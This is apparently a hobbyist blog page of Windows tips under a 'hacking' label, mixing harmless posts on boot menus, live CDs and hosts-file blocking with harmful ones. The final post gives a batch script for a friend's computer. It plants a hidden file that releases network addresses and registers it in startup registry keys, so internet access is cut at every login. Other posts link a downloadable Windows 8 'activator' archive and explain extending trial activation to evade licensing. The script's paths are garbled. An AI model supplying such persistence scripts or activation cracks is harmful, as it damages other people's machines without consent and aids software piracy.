Showing posts with label Website and Internet Hacking. Show all posts
Showing posts with label Website and Internet Hacking. Show all posts

Tuesday, 19 February 2013

How to remove an operating system from the boot menu

 If you have more then one operating system installed or wish
to remove an operating system from the boot menu, you can use the following information.


1.Click on Start, Control Panel, System, Advanced.

2.Under Startup and Recovery, click Settings.

3.Under Default Operating System, choose one of the following:

"Microsoft Windows XP Professional /fastdetect"

-or-

"Microsoft Windows XP Home /fasdetect"

-or-

"Microsoft Windows 2000 Professional /fastdetect"

4.Take the checkmark out of the box for "Time to display a list of Operating Systems".

5.Click Apply and Ok, and reboot the system.

*If you wish to edit the boot.ini file manually, click on the button "EDIT"


                                                                                                                       thank u..

Monday, 18 February 2013

Permanent activation For WINDOWS 8 All versions

Here's the link :

"https://sites.google.com/site/1k2kk785/home/downloads-by-khushroo/W8_Activator_WOC.rar?attredirects=0&d=1"

Download this RAR and activate your windows 8 permanently let your do his work on his own.

A command prompt will appear the your computer will restart after your computer has restarted you will see that you have activated windows 8 permanently. :)

If you don't understand any thing you can leave comment
                                    
                                                                                                               plz.. comment :)


                                                thank uuuuu...

Sunday, 17 February 2013

How to make a LIVE Operating system running CD/DVD/USB Drive

(Live)  Portable operating system
Now, you Can make your Operating system handy And take it wherever You want Insert It in your friend's computer and make them surprise that you changed their computer OS.

Just follow the steps So that you own a Live operating system : -

1) Open this link in a new Tab.
2) Link :"http://www.slax.org/download/7.0.5/slax-English-UK-7.0.5-i486.iso"
3)Save the .iso  file.
4)Now , you  Just need a .iso writer.
5)Download it from Here:"https://sites.google.com/site/1k2kk785/home/downloads-by-khushroo/FreeISOBurner.rar?attredirects=0&d=1 "
6) You Are done After this
7)Now you to burn these file to a 700mb disc.
8) After you have burnt this Cd
9)Restart your computer and boot from  this Cd.

10) Now , you have  your own portable operating system.


If you Didn't understand any thing please leave a comment :)


                                                                                  thank u.:)

Use Windows 7 Without activation Key


 

How to Use Windows 7 Without Activation


Windows 7 Most of you might be aware of the fact that it is possible to use Windows 7 and Vista for 120 days without activation. This is actually possible using the slmgr -rearm command which will extend the grace period from 30 days to 120 days. However in this post I will show you a small trick using which it is possible to use Windows 7 without activation for approximately an year! Here is a way to do that.

1. Goto "Start Menu -> All Programs -> Accessories" . Right click on "Command Prompt" and select "Run as Administrator". If you are not the administrator then you are prompted to enter the password, or else you can proceed to step-2.

2. Now type the following command and hit enter
slmgr -rearm

3. You will be prompted to restart the computer. Once restarted the trial period will be once again reset to 30 days. You can use the above command for up to 3 times by which you can extend the trial period to 120 days without activation.

4. Now comes the actual trick by which you can extend the trial period for another 240 days. Open Registry Editor (type regedit in "Run" and hit Enter) and navigate to the following location
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform

5. In right-side pane, change value of SkipRearm to 1.

6. Now you will be able to use the slmgr -rearm command for another 8 times so that you can skip activation process for another 240 days. So you will get 120 + 240 = 360 days of free Windows 7 usage.
120 days using "slmgr -rearm" command before registry edit

+

240 days using "slmgr -rearm" command after registry edit

= 360 Days

Wednesday, 14 November 2012

How To Block Websties Without Software

Steps:

1] Browse C:\WINDOWS\system32\drivers\etc
2] Find the file named "HOSTS"
3] Open it in notepad
4] Under "127.0.0.1 localhost" Add 127.0.0.2 www.sitenameyouwantblocked.com , and that site will no longer be accessable.
5] Done!

-So-

127.0.0.1 localhost
127.0.0.2 www.blockedsite.com

-->www.blockedsite.com is now unaccessable<--


For every site after that you want to add, just add "1" to the last number in the internal ip (127.0.0.2) and then the addy like before.

IE: 127.0.0.3 www.blablabla.com
127.0.0.4 www.blablabla.com
127.0.0.5 www.blablabla.com

etc

Tuesday, 13 November 2012

Disable Internet Permanently of your freind if you sit on his/her computer



 Copy this code in the notepad and save it as anything.bat or something like that


"  echo @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo You Have Been HACKED!
PAUSE     "

 

Search This Blog